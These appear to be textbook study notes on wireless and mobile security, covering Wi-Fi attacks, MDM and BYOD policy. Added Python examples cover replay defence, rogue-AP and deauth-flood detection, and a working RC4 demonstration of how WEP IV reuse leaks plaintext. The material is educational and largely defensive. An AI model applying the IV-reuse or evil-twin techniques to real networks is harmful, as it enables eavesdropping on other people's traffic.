MIMO can enhance the usable bandwidth and data transmission capacity between the access point and user. There are a wide variety of MIMO methods, and this technology, once considered cutting edge or advanced, is becoming mainstream.
Power Level Controls
Wi-Fi power levels can be controlled by the hardware for a variety of reasons.
With lower power, there is less opportunity for interference.
If power levels are too low, signal strength limits range.
Access points can have the power level set either manually or via programmatic control.
For most users, default mode is the best option.
In complex setups, power level controls can increase capacity and control on the network.
Access points can have the power level set either manually or via programmatic control. For most users, power level controls are not very useful, and leaving the unit in default mode is the best option. In complex enterprise setups, with site surveys and planned overlapping zones, this aspect of signal control can be used to increase capacity and control on the network.
Site Surveys (1 of 2)
A site survey involves several steps:
Mapping the floor plan, testing for RF interference, testing for RF coverage, and analysis of material via software
The software can suggest placement of access points.
After deploying the APs, the site is surveyed again, mapping the results versus the predicted, watching signal strength and signal-to-noise ratios.
Site surveys can be used to ensure availability of wireless, especially when it is critical for users to have connections.
Exam Tip: Wireless networks are dependent upon radio signals to function. It is important to understand that antenna type, placement, and site surveys are used to ensure proper coverage of a site, including areas blocked by walls, interfering signals, and echoes.
Site Surveys (2 of 2)
Figure 12.7 Example site survey
This figure illustrates what a site survey looks like. The different shades indicate signal strength, showing where reception is strong and where it is weak.
MAC Filtering
MAC filtering is the selective admission of packets based on a list of approved Media Access Control (MAC) addresses.
Employed on switches – provides machine authentication
Wired networks – have the protection afforded by the wires, making interception of signals to determine their MAC addresses difficult
Wireless networks – suffer from the fact that an attacker can see the MAC addresses of all traffic to and from the access point, and can then spoof the MAC addresses that are permitted to communicate via the access point.
Captive Portals
Captive portal refers to a specific technique of using an HTTP client to handle authentication on a wireless network.
It is frequently employed in public hotspots and opens a web browser to an authentication page.
This occurs before the user is granted admission to the network.
The access point intercepts all packets and returns the web page for login.
The actual web server that serves up the authentication page can be in a walled-off section of the network.
Securing Public Wi-Fi
An issue associated with wireless transmissions is that they are subject to interception by anyone within range of the hotspot.
Possible for others to intercept and read traffic of anyone using the hotspot, unless encryption is used.
Common practice is to use wireless security, even when the intent is to open the channel for everyone.
Having a default password, even one that everyone knows, will make it so that people cannot observe other traffic.
There is an entire open wireless movement, designed around a sharing concept that promotes sharing of the Internet to all. For information, check out https://openwireless.org.
Replay
A replay attack occurs when the attacker captures a portion of a communication between two parties and retransmits it at a later time.
Replay attacks are associated with attempts to circumvent authentication mechanisms.
The best way to prevent replay attacks is with encryption, cryptographic authentication, and time stamps.
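The three defenses on this slide combined into one receiver-side check, as an added example that is not part of the textbook: each message carries a random nonce and a time stamp under an HMAC tag, so a captured copy replayed later fails the freshness window and a copy replayed quickly fails the nonce check. The key, clock values, payloads and the 30-second window are constructed for the demo.

```python
"""Replay-resistant message check: cryptographic authentication (HMAC),
a per-message nonce, and a time stamp with a freshness window."""
import hmac
import hashlib
import secrets
import struct

MAX_SKEW_SECONDS = 30  # constructed value: accept only messages this fresh


def build_message(key: bytes, payload: bytes, now: int) -> bytes:
    """Sender side: 16-byte random nonce || 8-byte time stamp || payload || tag."""
    nonce = secrets.token_bytes(16)
    header = nonce + struct.pack(">Q", now)
    tag = hmac.new(key, header + payload, hashlib.sha256).digest()
    return header + payload + tag


class ReplayGuard:
    """Receiver side: verifies the tag, the time window and nonce uniqueness."""

    def __init__(self, key: bytes):
        self.key = key
        self.seen_nonces = {}  # nonce -> time stamp it arrived with

    def accept(self, message: bytes, now: int) -> tuple:
        if len(message) < 16 + 8 + 32:
            return False, "too short"
        nonce, ts_raw = message[:16], message[16:24]
        body, tag = message[:-32], message[-32:]
        # 1. Cryptographic authentication: forged or modified frames are rejected
        #    before any other field is trusted.
        expected = hmac.new(self.key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False, "bad tag"
        # 2. Time stamp: a recording replayed much later is stale.
        (ts,) = struct.unpack(">Q", ts_raw)
        if abs(now - ts) > MAX_SKEW_SECONDS:
            return False, "stale"
        # 3. Nonce: a recording replayed inside the window is a duplicate.
        if nonce in self.seen_nonces:
            return False, "replayed nonce"
        self.seen_nonces[nonce] = ts
        self._expire(now)
        return True, "ok"

    def _expire(self, now: int) -> None:
        # Nonces older than the window can no longer pass check 2, so forget them
        # and keep the replay cache bounded.
        stale = [n for n, ts in self.seen_nonces.items() if now - ts > MAX_SKEW_SECONDS]
        for n in stale:
            del self.seen_nonces[n]


def demo() -> list:
    """Legitimate delivery, two replays of the same capture, and a tampered copy."""
    key = secrets.token_bytes(32)
    guard = ReplayGuard(key)
    captured = build_message(key, b"OPEN_DOOR", now=1_000_000)
    results = [
        guard.accept(captured, now=1_000_001)[1],  # genuine message
        guard.accept(captured, now=1_000_005)[1],  # replayed 5 s later
        guard.accept(captured, now=1_000_900)[1],  # replayed 15 min later
    ]
    # Same header and tag, different 9-byte payload: the tag no longer matches.
    tampered = captured[:24] + b"OPEN_SAFE" + captured[33:]
    results.append(guard.accept(tampered, now=1_000_002)[1])
    return results


if __name__ == "__main__":
    print(demo())
```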
IV
The initialization vector (IV) is used in wireless systems as the randomization element at the beginning of a connection.
Attacks against the IV aim to determine it, which leads to finding the repeating key sequence.
The IV is the primary reason for the weaknesses in WEP.
This weakness led to the fall of WEP and WPA.
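Why a repeated IV exposes the keystream, shown with the standard RC4 algorithm in the WEP arrangement (IV prepended to the shared key); this is an added example, not the textbook's material, and the key, frames and IVs are constructed. When two frames share an IV they share a keystream, so XORing the two ciphertexts cancels it and leaves the XOR of the two plaintexts without any knowledge of the key; with a fresh IV the same XOR yields nothing.

```python
"""IV reuse in a stream cipher: same IV + same key = same keystream."""


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4: key-scheduling algorithm, then the generation loop."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_style_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP seeds RC4 with the 3-byte per-frame IV followed by the shared key
    (the integrity check value is omitted here). Decryption is the same call."""
    assert len(iv) == 3, "WEP uses a 24-bit IV"
    return xor_bytes(rc4_keystream(iv + key, len(plaintext)), plaintext)


def observer_xor(c1: bytes, c2: bytes) -> bytes:
    """What a passive listener can compute from two captured ciphertexts.
    If both frames used the same keystream this equals p1 XOR p2."""
    return xor_bytes(c1, c2)


def demo() -> dict:
    key = bytes.fromhex("0f1e2d3c4b")  # constructed 40-bit WEP key
    p1 = b"GET /index.html "              # two constructed 16-byte frames
    p2 = b"user=alice&pw=hu"
    iv_reused, iv_fresh = b"\x01\x02\x03", b"\x01\x02\x04"
    c1 = wep_style_encrypt(iv_reused, key, p1)
    c2_same_iv = wep_style_encrypt(iv_reused, key, p2)
    c2_fresh_iv = wep_style_encrypt(iv_fresh, key, p2)
    return {
        # True: the keystream cancelled and p1 XOR p2 is exposed.
        "same_iv_leaks": observer_xor(c1, c2_same_iv) == xor_bytes(p1, p2),
        # False: different IVs give unrelated keystreams.
        "fresh_iv_leaks": observer_xor(c1, c2_fresh_iv) == xor_bytes(p1, p2),
        # Only 2**24 IVs exist, so a busy access point is forced to repeat them.
        "iv_space": 2 ** 24,
    }


if __name__ == "__main__":
    print(demo())
```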
Evil Twin
An evil twin attack is an attack against the wireless protocol via substitute hardware.
The attacker uses his enhanced access point (AP) to create a better connection to entice users and computers to attach to it.
Attackers can more easily analyze traffic and perform man-in-the-middle types of attacks with users connected to the evil access point.
For a simple denial of service (DoS), the attacker could use interference to jam the wireless signal.
Rogue AP
By setting up a rogue access point (AP), or rogue AP, an attacker can attempt to get clients to connect to it as if it were authorized and then simply authenticate to the real AP.
A simple way to gain access to the network and the client’s credentials.
Rogue APs can act as a man-in-the-middle and steal users’ credentials.
Enterprises with wireless APs should routinely scan for and remove rogue APs.
Jamming
Jamming is a form of denial of service, specifically against the radio spectrum aspect of wireless.
Jamming can enable things such as attachment to a rogue AP.
Specific Bluetooth Attacks
Bluejacking
The sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices.
Bluesnarfing
The unauthorized access of information from a Bluetooth-enabled device through a Bluetooth connection.
Bluebugging
Using a Bluetooth-enabled device to eavesdrop on another person’s conversation using that person’s Bluetooth phone.
Bluetooth DoS
Using Bluetooth to perform a DoS attack.
RFID
Radio Frequency Identification (RFID) tags are used in applications ranging from tracking devices to tracking keys.
Active tags have a power source.
Passive tags utilize the RF energy transmitted to them for power.
Physical security is a security concern.
Several different attack types can be performed against RFID systems.
Disassociation
Disassociation attacks against a wireless system are those attacks designed to disassociate a host from the wireless access point, and from the wireless network.
Disassociation attacks stem from the deauthentication frame that is in the IEEE 802.11 (Wi-Fi) standard.
Disassociation attacks are not typically used alone, but rather in concert with another attack objective.
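Detection logic for the two threats above, the rogue AP (scan for APs that should not be there) and the disassociation/deauthentication flood that often precedes a rogue-AP connection, as an added example that is not part of the textbook. The log format, the authorized-BSSID inventory and the rate threshold are all constructed for the demo and do not correspond to any specific wireless IDS product.

```python
"""Two wireless IDS checks over management-frame log records:
(1) beacons for a protected SSID from a BSSID not in the AP inventory;
(2) deauth/disassoc floods against a client, detected by rate."""
from collections import defaultdict

# Constructed inventory: BSSIDs of the enterprise's legitimate APs, per SSID.
AUTHORIZED_BSSIDS = {"corp-wifi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}}

DEAUTH_THRESHOLD = 5         # frames per (source, victim) pair ...
DEAUTH_WINDOW_SECONDS = 2.0  # ... within this window raises an alert

# Constructed log: "<epoch seconds> <frame type> <source> <destination> <ssid>"
# The deauth frames claim to come from the real AP: baseline 802.11 does not
# authenticate management frames, so that address cannot be trusted.
SAMPLE_LOG = """\
1700000000.00 beacon aa:bb:cc:00:00:01 ff:ff:ff:ff:ff:ff corp-wifi
1700000000.10 beacon aa:bb:cc:00:00:02 ff:ff:ff:ff:ff:ff corp-wifi
1700000000.20 beacon de:ad:be:ef:00:01 ff:ff:ff:ff:ff:ff corp-wifi
1700000000.30 beacon 11:22:33:44:55:66 ff:ff:ff:ff:ff:ff guest-cafe
1700000001.00 deauth aa:bb:cc:00:00:01 66:77:88:99:aa:bb -
1700000001.10 deauth aa:bb:cc:00:00:01 66:77:88:99:aa:bb -
1700000001.20 deauth aa:bb:cc:00:00:01 66:77:88:99:aa:bb -
1700000001.30 deauth aa:bb:cc:00:00:01 66:77:88:99:aa:bb -
1700000001.40 deauth aa:bb:cc:00:00:01 66:77:88:99:aa:bb -
1700000001.50 deauth aa:bb:cc:00:00:01 66:77:88:99:aa:bb -
1700000030.00 deauth aa:bb:cc:00:00:02 66:77:88:99:aa:bb -
1700000100.00 beacon de:ad:be:ef:00:01 ff:ff:ff:ff:ff:ff corp-wifi
"""


def parse_log(text: str) -> list:
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ftype, src, dst, ssid = line.split()
        records.append({"ts": float(ts), "type": ftype, "src": src, "dst": dst, "ssid": ssid})
    return records


def find_rogue_aps(records: list, authorized: dict = AUTHORIZED_BSSIDS) -> list:
    """Any BSSID beaconing one of our SSIDs that is not in the inventory.
    SSIDs we do not own (the cafe next door) are ignored. Returns sorted
    (ssid, bssid) pairs, one per offending AP however often it beacons."""
    rogues = set()
    for r in records:
        if r["type"] != "beacon" or r["ssid"] not in authorized:
            continue
        if r["src"] not in authorized[r["ssid"]]:
            rogues.add((r["ssid"], r["src"]))
    return sorted(rogues)


def find_deauth_floods(records: list, threshold: int = DEAUTH_THRESHOLD,
                       window: float = DEAUTH_WINDOW_SECONDS) -> list:
    """Sliding-window count of deauth/disassoc frames per (claimed source,
    victim). Because the source may be forged, the rate is the usable signal;
    a single deauth (the legitimate AP dropping an idle client) is normal.
    802.11w Management Frame Protection is the protocol-level fix.
    Returns one (pair, count_in_window, time_of_alert) per offending pair."""
    windows = defaultdict(list)
    alerted = set()
    alerts = []
    for r in records:
        if r["type"] not in ("deauth", "disassoc"):
            continue
        key = (r["src"], r["dst"])
        w = windows[key]
        w.append(r["ts"])
        while w and r["ts"] - w[0] > window:   # drop frames outside the window
            w.pop(0)
        if len(w) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((key, len(w), r["ts"]))
    return alerts


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("rogue APs:", find_rogue_aps(recs))
    print("deauth floods:", find_deauth_floods(recs))
```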
Mobile Device Management Concepts
Mobile device management (MDM) began as a marketing term for a collective set of commonly employed protection elements associated with mobile devices.
When viewed as a comprehensive set of security options for mobile devices, an MDM policy should be created and enforced by every corporation.
Password policies should extend to mobile devices, including lockout and, if possible, the automatic wiping of data.
Application Management
Applications request access to information stores on mobile devices
Mobile application management solution needed because of potential security problems
Restrict types of applications that can be downloaded and used on mobile devices
Provide an enterprise application store where only company-approved applications are available
May state that apps cannot come from any other source
May need to use an MDM solution
Full Device Encryption (FDE)
Protecting information on mobile devices is becoming a business imperative.
Consider encrypting mobile device data in case of loss or theft
Complete some rigorous market analysis to determine what commercial product meets your needs.
Content Management
Content management is the set of actions used to control content issues on mobile devices.
Content management goes beyond data ownership policy.
Examines what content belongs on what devices
Establishes mechanisms to enforce these rules
MDM solutions exist to assist in this security issue with respect to mobile devices.
Remote Wipe
It is unlikely that a lost or stolen device will be recovered.
This makes even encrypted data stored on the device more vulnerable to decryption.
Remote wiping a mobile device typically removes data stored on the device and resets the device to factory settings.
Geofencing
Geofencing is the use of GPS and/or RFID technology to create a virtual fence around a particular location, and to detect when devices cross the fence.
Enables devices to be recognized by location and have actions taken.
Geofencing is used in marketing to send messages to devices that are in a specific area.
Geofencing has been used for remote workers, notifying management when they have arrived at remote work sites.
Geolocation
Many apps rely heavily on GPS location
Device-locating services, mapping applications, traffic monitoring apps, and apps that locate nearby businesses such as gas stations and restaurants.
Geolocation: technology to track movement and location of mobile device.
Tracking can be used to assist in the recovery of lost devices.
Geo-tagging (1 of 2)
Geo-tagging is the posting of location information into a data stream signifying where the device was when the stream was created.
Many mobile devices include on-board cameras, and the photos/videos they take can divulge information.
Geo-tagging can make location part of any picture or video.
Geo-tagging (2 of 2)
Posting photos with geo-tags embedded in them has its use.
Can unexpectedly divulge information users might not want to share.
It is recommended that it be disabled unless you have a specific reason for having the location information embedded in a photo.
Screen Locks
Screen-locking capability usually consists of entering a passcode or PIN to unlock the device.
Highly recommended that screen locks be enforced for all mobile devices.
Some more advanced forms of screen locks work in conjunction with device wiping.
Various lockout situations
Push Notification Services
Push notification services are services that deliver information to mobile devices without a specific request from the device.
Push notifications are used a lot in mobile devices to indicate that content has been updated.
Push notification methods are typically unique to the platform.
Passwords and PINs
Passwords and PINs are common security measures used to protect mobile devices from unauthorized use.
These are essential tools and should be used in all cases, and mandated by company policy.
Biometrics
Biometrics are used across a wide range of mobile phones as a means of access control.
Newest biometric method: facial recognition
Based on a camera image of user holding their phone
Offers some promise but has similar concerns
It has been shown that these devices can be bypassed
One should consider them to be convenience features, not security features.
Context-Aware Authentication
Context-aware authentication is the use of contextual information to make the authentication decision as to whether to permit access to the requested resource.
Goal is to prevent unauthorized end users, devices, or network connections from being able to access corporate data.
This approach can be used to allow an authorized user to access network-based resources from inside the office, but deny access if they are connecting via a public Wi-Fi network.
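A policy decision of the kind the slide describes, as an added example that is not part of the textbook: the same authenticated user on the same device is allowed from the office, denied on public Wi-Fi, and asked for step-up authentication when remote. The request attributes, device-posture fields, network ranges and policy tiers are constructed for the demo and are not any vendor's schema.

```python
"""Context-aware access decision: user identity + device posture + network context."""
from dataclasses import dataclass
import ipaddress

# Constructed definitions of "inside the office".
CORPORATE_NETWORKS = [ipaddress.ip_network("10.0.0.0/8"),
                      ipaddress.ip_network("192.168.50.0/24")]
TRUSTED_SSIDS = {"corp-wifi"}


@dataclass
class AccessRequest:
    user_authenticated: bool
    mfa_completed: bool
    mdm_enrolled: bool          # reported by the MDM agent
    jailbroken_or_rooted: bool  # reported by the MDM agent
    screen_lock_enabled: bool
    client_ip: str
    ssid: str                   # "" when not on Wi-Fi (wired or cellular)
    resource_sensitivity: str   # "public", "internal" or "confidential"


def network_context(req: AccessRequest) -> str:
    """Classify where the request comes from: office, public-wifi or remote."""
    ip = ipaddress.ip_address(req.client_ip)
    on_corporate_ip = any(ip in net for net in CORPORATE_NETWORKS)
    if on_corporate_ip and (req.ssid == "" or req.ssid in TRUSTED_SSIDS):
        return "office"
    if req.ssid and req.ssid not in TRUSTED_SSIDS:
        return "public-wifi"   # any Wi-Fi network we do not operate
    return "remote"            # cellular, home broadband, VPN endpoint, etc.


def decide(req: AccessRequest) -> tuple:
    """Return ("allow" | "step-up" | "deny", reason)."""
    if not req.user_authenticated:
        return "deny", "user not authenticated"
    # Device posture is checked regardless of location: a rooted or
    # unmanaged device does not become trustworthy by sitting in the office.
    if req.jailbroken_or_rooted:
        return "deny", "device is rooted or jailbroken"
    if not req.mdm_enrolled or not req.screen_lock_enabled:
        return "deny", "device not compliant with MDM policy"
    ctx = network_context(req)
    if req.resource_sensitivity == "public":
        return "allow", f"public resource, context {ctx}"
    if ctx == "office":
        return "allow", "compliant device on the corporate network"
    if ctx == "public-wifi":
        # Same user and device as the office case; the network context alone
        # changes the answer, which is the point of the slide.
        return "deny", "corporate data is not served over public Wi-Fi"
    if req.resource_sensitivity == "confidential" and not req.mfa_completed:
        return "step-up", "MFA required for confidential data off-network"
    return "allow", f"remote access permitted for {req.resource_sensitivity} data"


def demo() -> list:
    """Four constructed scenarios; only the context differs between the first two."""
    base = dict(user_authenticated=True, mfa_completed=False, mdm_enrolled=True,
                jailbroken_or_rooted=False, screen_lock_enabled=True,
                resource_sensitivity="confidential")
    scenarios = [
        AccessRequest(client_ip="10.1.2.3", ssid="corp-wifi", **base),
        AccessRequest(client_ip="172.16.5.9", ssid="airport-free", **base),
        AccessRequest(client_ip="203.0.113.7", ssid="", **base),
        AccessRequest(client_ip="10.1.2.3", ssid="corp-wifi",
                      **{**base, "jailbroken_or_rooted": True}),
    ]
    return [decide(s)[0] for s in scenarios]


if __name__ == "__main__":
    print(demo())
```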
Containerization
Containerization on mobile devices refers to dividing the device into a series of containers.
One container holding work-related materials and the other personal materials.
Containers can separate apps, data, and virtually everything on the device.
Storage Segmentation
Storage segmentation involves separate virtual containers.
Personal data is kept separate from corporate data and applications.
This protection is strongly recommended for devices that are used to handle highly sensitive corporate data.
Asset Control
Asset control entails implementing a viable asset tracking and inventory control mechanism.
For security and liability reasons, the company needs to know what devices are connecting to its systems and what access has been granted.
Just as in IT systems, maintaining a list of approved devices is a critical control.
Device Access Control
Principles of access control for mobile devices need to be managed just like access control from wired or wireless desktops and laptops.
Device access control is critical as storage in the cloud and SaaS become more prevalent.
Rigorous data access principles need to be applied, and they become even more important with the inclusion of mobile devices as fully functional computing devices.
Review possible solutions
Removable Storage
The security needs of removable devices must be addressed.
All removable devices should be scanned by antivirus software upon connection to the corporate environment.
Corporate policies should address the copying of data to removable devices.
Many mobile devices can be connected via USB to a system and used to store data—and in some cases vast quantities of data.
Disabling Unused Features
As with all computing devices, features that are not used or that present a security risk should be disabled.
It is best to make Bluetooth connections undiscoverable.
Requiring Bluetooth connections to be undiscoverable is very hard to enforce but should be encouraged as a best practice.
Mobile Application Security
Applications that run on the devices represent security threats to the information that is stored on and processed by the device.
Applications are the software elements that can be used to violate security, even when the user is not aware.
Many games and utilities offer value to the user, but at the same time they scrape information stores on the device for information.
Application Control
An app store provides apps and their updates in one convenient location for mobile devices.
In devices used on enterprise networks, the security provided by the app store may not meet the requirements of the business.
A separate application, typically known as a Mobile Device Manager (MDM), can handle device configuration as well as security.
Key and Credential Management
Key and credential management services are being integrated into most MDM services to ensure that existing strong policies and procedures can be extended to mobile platforms securely.
These services include protection of keys for digital signatures and S/MIME encryption and decryption.
Keys and credentials are among the highest-value items that can be found on mobile devices, so ensuring protection for them is a key element in mobile device security.
Authentication
When mobile devices are used to access business networks, authentication becomes an issue.
Mobile device can store certificates.
The authentication problem is moved to the endpoint, where it relies on passcodes, screen-locks, and other mobile device protections.
These can be weak unless structured together.
The risk in mobile authentication is that strong credentials stored in the device are protected by the less rigorous passcode and the end user.
Application Whitelisting
Application whitelisting and blacklisting enables you to control and block applications available on the device.
Whitelisting is the use of a preapproved list of behaviors – only those on the whitelist are allowed.
Blacklisting is the list of behaviors that are specifically blocked.
Encryption
Encrypt both the device and applications.
The only way to segregate data within the device is for apps to manage their own data stores through app-specific encryption.
Transitive Trust/Authentication
Trust relationships can be very complex in mobile devices, and often security aspects are not properly implemented.
Mobile devices tend to be used across numerous systems, including business, personal, public, and private.
This greatly expands the risk profile and opportunity for transitive trust–based attacks.
Mobile applications should be carefully reviewed to ensure that trust relationships are secure.
Policies for Enforcement and Monitoring
Your corporate policies regarding mobile devices should be consistent with your existing computer security policies.
Your training programs should include instruction on mobile device security.
Disciplinary actions should be consistent. Your monitoring programs should be enhanced to include monitoring and control of mobile devices.
Third-party App Stores
A third-party app store is a mobile device manufacturer-associated application store where applications can be downloaded to the device.
The Apple store is built on a principle of exclusivity, and security is highly enforced on apps.
The Google store has fewer restrictions, which has translated into some security issues from apps.
Managing what applications a user can add to the device is essential because many of these applications can create security risks for the enterprise.
Rooting/Jailbreaking
A common hack associated with mobile devices is the jailbreak.
Jailbreaking is a process by which the user escalates their privilege level, bypassing the operating system’s controls and limitations.
Rooting a device is a process whereby OS controls are bypassed, and this is the term frequently used for Android devices.
The effect is the same whether the device is rooted or jailbroken.
Sideloading
Sideloading is the process of adding apps to a mobile device without using the authorized store associated with the device.
Currently, sideloading only works on Android devices.
Sideloading is an alternative means of instantiating an app on the device without having to have it hosted on the app store.
The downside, simply put, is that without the app store screening, one is at greater risk of installing malicious software in the guise of a desired app.
Custom Firmware
Custom firmware is firmware for a device that has been altered from the original factory settings.
Can bring added functionality
Can result in security holes.
Should only be done on devices without access to critical information.
Carrier unlocking
If you have a carrier-locked device and you attempt to use a SIM card from another carrier, the phone will not accept it unless you unlock the device.
Carrier unlocking is the process of telling the device to sever itself from the carrier.
This is usually done through the inputting of a special key sequence that unlocks the device.
Firmware OTA updates
Firmware is software that requires updating.
With mobile devices being literally everywhere, the scale does not support bringing the device to a central location or connection for updating.
Firmware OTA (over the air) updates are a solution to this problem.
It is possible to have a menu option that permits the device firmware to be updated. All major device manufacturers support this model because it is the only real workable solution.
Camera Use
Mobile devices include on-board cameras, and the photos/videos they take can divulge information.
Mobile devices may be used for illegal purposes.
This creates a liability for the company.
User concern is that their personal photos will be lost during a device wipe originated by the company.
SMS/MMS
Short Message Service (SMS) and Multimedia Messaging Service (MMS) are standard protocols used to send messages to and from mobile cellular devices.
SMS
Limited to text-only messages of <160 characters
Because of the content connections that can be sent via MMS in particular, and SMS in certain cases, it is important to at least address these communication channels in relevant policies.
External media
External media refers to any item or device that can store data.
External media can deliver malware into the enterprise.
The risk is evident
The key is to develop a policy that determines where these devices can exist and where they should be banned, and then follow the plan with monitoring and enforcement.
USB OTG
USB OTG (USB On-The-Go) is an extension of USB technology that facilitates direct connection between USB OTG–enabled mobile devices.
USB OTG allows those devices to switch back and forth between the roles of host and device.
USB OTG allows the connection of USB-based peripherals, such as keyboards, mice, and storage, to mobile devices.
Although USB OTG is relatively new, most mobile devices made since 2015 are USB OTG compatible.
Recording Microphone
Many of today’s electronic devices have the ability to record audio information.
Recording microphones can be used to record conversations and collect sensitive data, and the parties under observation are not even aware of the incident.
As with other high-tech gadgets, the key is to determine the policy of where they can be used and the rules for their use.
GPS Tagging
GPS tagging is the addition of GPS information to a file, folder, or other digital item.
Adding GPS information to the metadata of a file can add value in that it enables site-specific information to be associated with the digital item.
This can be a location that a picture was taken, or map coordinates when linking to mapping software.
Wi-Fi Direct/Ad Hoc
In Wi-Fi Direct, two Wi-Fi devices connect to each other in a single-hop connection.
One device acts as an access point for the other device.
The key element is the single-hop nature of a Wi-Fi Direct connection.
For Wi-Fi ad hoc, the primary difference is that in the ad hoc network, multiple devices can communicate with each other, with each device capable of communicating with all other devices.
Tethering
Tethering is the connection of a device to a mobile device that has a means of accessing a network for the purpose of sharing network access.
Connecting a mobile phone to a laptop to charge the phone’s battery is not tethering.
Connecting it so that the laptop can use the phone to connect to the Internet is tethering.
Tethering introduces new network connections that lie outside the enterprise’s span of control:
It can act to bridge your enterprise network with the outside network.
Payment Methods
Today, we have new intermediaries:
Smart devices with NFC linked to credit cards offer a convenience alternative for payments.
The actual payment is still a credit/debit card charge, but the payment pathway is through the digital device.
Utilizing the security features of the device, NFC, and biometrics/PIN, this form of payment has some advantages over the other methods.
It allows for the addition of specific security measures before the payment method is accessed.
Deployment Models
When determining how to incorporate mobile devices securely within the enterprise, you have a wide range of considerations.
How will security be enforced?
How will all the policies be enforced?
What devices will be supported in the enterprise?
There are a variety of deployment models.
From employee-owned to corporate-owned, with mixtures of the two in between.
Each of these models has advantages and disadvantages.
CYOD
CYOD (choose your own device) users have a choice in the type of device.
In most cases, this choice is constrained to a list of acceptable devices that can be supported in the enterprise.
Because the device is corporate-owned, CYOD provides greater flexibility in corporate restrictions on device use, in terms of apps, data, updates, and so on.
COPE
COPE (company-issued, personally-enabled)
A model where employees are supplied a phone chosen and paid for by the company, but they are given permission to use it for personal activities.
The company can decide how much choice and freedom employees get with the personal use of the device.
This allows the enterprise to control security functionality while dealing with the employee dissatisfaction associated with the traditional method of supplying devices: corporate-owned business-only (COBO).
Corporate Owned
Corporate-owned business-only (COBO)
A model in which the business supplies a mobile device for company-only use on the part of the employee.
This has the disadvantage of the employee having to carry two devices—one personal and one for work—and then separate functions between the devices based on the purpose of use in each instance.
The advantage is that the corporation has complete control over the device and can apply any security controls desired without interference from other device functionality.
BYOD (1 of 12)
Permitting employees to “bring your own device” (BYOD) has many advantages in business.
Users tend to prefer having a single device rather than carrying multiple devices.
Users have less of a learning curve on devices they already have an interest in learning.
The disadvantage is that employees will not be eager to limit the use of their personal devices based on corporate policies, so corporate control will be limited.
BYOD (2 of 12)
Data ownership
BYOD blurs the lines of data ownership.
If a company owns a smartphone issued to an employee, the company can repossess the phone upon employee termination.
This practice may protect company data by keeping company-issued devices in the hands of employees only.
A company cannot rely on a simple factory reset before reissuing a device.
A personal device used for business purposes may have some company data remaining on it.
BYOD (3 of 12)
Storage Segmentation
Storage segmentation methods are needed whenever a device has multilevel data security types, as in personal and corporate, or corporate and highly sensitive corporate.
Having the ability to manage the separate data streams based on their sensitivity is important because of the highly mobile nature of the device.
BYOD (4 of 12)
Support ownership
Support costs for mobile devices are an important consideration for corporations.
Each device has its own implementation of various functions.
The support organization needs viable knowledge base articles and job aids to provide sufficient support for the wide variety of ever-changing devices.
BYOD (5 of 12)
Patch management
Corporate policy should require mobile devices to be kept current with respect to patches.
Keeping devices patched is one of the best defenses against viruses, malware, and other threats.
It is important to recognize that “jailbreaking” or “rooting” your device may remove the manufacturer’s security mechanisms and protection against malware and other threats.
BYOD (6 of 12)
Antivirus management
Mobile devices need protection against viruses and malware.
Forensics is a rapidly evolving, fast-changing field.
Privacy
Personal devices used for work may lead to strong expectations that privacy will be protected by the company.
Policy needs to consider and address this explicitly.
BYOD (7 of 12)
Onboarding/Offboarding
When new employees join a company, the onboarding process needs to include provisions for mobile device responsibilities.
Mobile devices supplied by the company should be collected upon termination.
BYOD equipment should have its access to corporate resources terminated as part of the offboarding process.
Regular audits for old or unterminated accounts should be performed to ensure prompt deletion of accounts for terminated employees.
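The audit described on this slide can be made concrete as a reconciliation of the HR roster against the device inventory and the account directory. The script below is an added illustration, not code from the textbook; the data structures, the per-model action mapping, and all sample records are constructed for the example, and the actions mirror the slide: company-supplied devices are collected, BYOD devices only lose corporate access.

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional


@dataclass
class Employee:
    user: str
    terminated: Optional[date]  # None while still employed


@dataclass
class Device:
    user: str
    model: str      # ownership model from the chapter: COBO, COPE, CYOD or BYOD
    enrolled: bool  # still enrolled in MDM / still reaching corporate resources


# Hypothetical mapping of ownership model to offboarding action (not the textbook's):
# corporate-owned devices are collected, BYOD devices only have access revoked.
ACTION = {
    "BYOD": "revoke corporate access; device stays with employee",
    "COBO": "collect device and wipe",
    "COPE": "collect device and wipe",
    "CYOD": "collect device and wipe",
}


def audit_offboarding(employees, devices, accounts, today):
    """Return (user, subject, action) triples for access that should no longer exist.

    employees: HR roster; devices: MDM inventory; accounts: {user: enabled}.
    """
    roster = {e.user: e for e in employees}
    gone = {u for u, e in roster.items() if e.terminated and e.terminated <= today}
    findings = []
    for d in devices:
        if d.user in gone and d.enrolled:
            findings.append((d.user, f"{d.model} device", ACTION[d.model]))
    for user, enabled in sorted(accounts.items()):
        if not enabled:
            continue
        if user in gone:
            findings.append((user, "account", "disable account"))
        elif user not in roster:  # account with no HR record at all
            findings.append((user, "account", "no HR record: investigate orphan account"))
    return findings


# Constructed sample data: bob left on 2018-03-01, carol leaves in the future,
# and "dave" has an account but no HR record.
EMPLOYEES = [Employee("alice", None), Employee("bob", date(2018, 3, 1)),
             Employee("carol", date(2018, 6, 30))]
DEVICES = [Device("alice", "BYOD", True), Device("bob", "BYOD", True),
           Device("bob", "COBO", True), Device("carol", "COPE", True)]
ACCOUNTS = {"alice": True, "bob": True, "carol": True, "dave": True}
TODAY = date(2018, 4, 15)

if __name__ == "__main__":
    for finding in audit_offboarding(EMPLOYEES, DEVICES, ACCOUNTS, TODAY):
        print(*finding, sep=" | ")
```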
BYOD (8 of 12)
Adherence to corporate policies
Corporate policies regarding BYOD devices should be consistent with your existing computer security policies.
Training programs should include instruction on mobile device security.
Disciplinary actions should be consistent.
